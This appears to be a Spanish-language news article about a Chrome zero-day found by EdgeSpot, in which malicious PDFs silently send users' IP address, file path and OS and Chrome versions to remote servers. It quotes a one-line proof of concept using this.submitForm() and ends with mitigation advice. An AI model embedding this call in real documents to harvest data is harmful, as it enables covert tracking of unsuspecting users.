El servicio de detección de exploits EdgeSpot descubrió una intrigante vulnerabilidad de día cero de Chrome que explota documentos PDF. La vulnerabilidad permite a los atacantes recolectar datos confidenciales utilizando documentos PDF maliciosos abiertos en Chrome.

Tan pronto como la víctima abre los respectivos archivos PDF en Google Chrome, un programa malicioso comienza a funcionar en segundo plano mediante la recopilación de datos del usuario.

Luego, los datos se envían al servidor remoto que los piratas informáticos controlan. Tal vez se pregunte qué datos están siendo absorbidos por los atacantes, se dirigen a los siguientes datos en su PC:

• dirección IP
• Ruta completa del archivo PDF en el sistema
• SO y versiones de Chrome

Cuidado con los archivos PDF con malware

Es posible que se sorprenda al saber que no sucede nada cuando Adobe Reader se utiliza para abrir archivos PDF. Además, las solicitudes HTTP POST se utilizan para transferir datos a los servidores remotos sin intervención del usuario.

Los expertos descubrieron que uno de los dos dominios readnotifycom o burpcollaboratornet estaba recibiendo los datos.

Puede imaginar la intensidad del ataque considerando el hecho de que la mayoría del software antivirus no puede detectar las muestras detectadas por EdgeSpot.

Los expertos revelan que los atacantes están utilizando la API Javascript Javascript "this.submitForm ()" para recopilar la información confidencial de los usuarios.

Lo probamos con un PoC mínimo, una simple llamada a la API como "this.submitForm ('http://google.com/test')" hará que Google Chrome envíe los datos personales a google.com.

Los expertos descubrieron que este error de Chrome estaba siendo explotado por dos conjuntos distintos de archivos PDF maliciosos. Ambos circularon en octubre de 2017 y septiembre de 2018, respectivamente.

Cabe destacar que los atacantes pueden utilizar los datos recopilados para ajustar los ataques en el futuro. Los informes sugieren que el primer lote de archivos se compiló utilizando el servicio de seguimiento de PDF de ReadNotify.

Los usuarios pueden utilizar el servicio para realizar un seguimiento de las vistas de los usuarios. EdgeSpot no ha compartido ningún detalle sobre la naturaleza del segundo conjunto de archivos PDF.

Cómo mantenerse protegido

El servicio de detección de exploits EdgeSpot quería alertar a los usuarios de Chrome sobre los riesgos potenciales porque no se espera que el parche se lance en un futuro cercano.

EdgeSpot informó a Google sobre la vulnerabilidad el año pasado y la compañía prometió lanzar un parche a fines de abril. H

Sin embargo, puede considerar el uso de una solución temporal al problema visualizando localmente los documentos PDF recibidos utilizando una aplicación alternativa de lector de PDF.

Alternativamente, también puede abrir sus documentos PDF en Chrome desconectando sus sistemas de Internet. Mientras tanto, puede esperar la actualización de Chrome 74 que se espera que se lance el 23 de abril.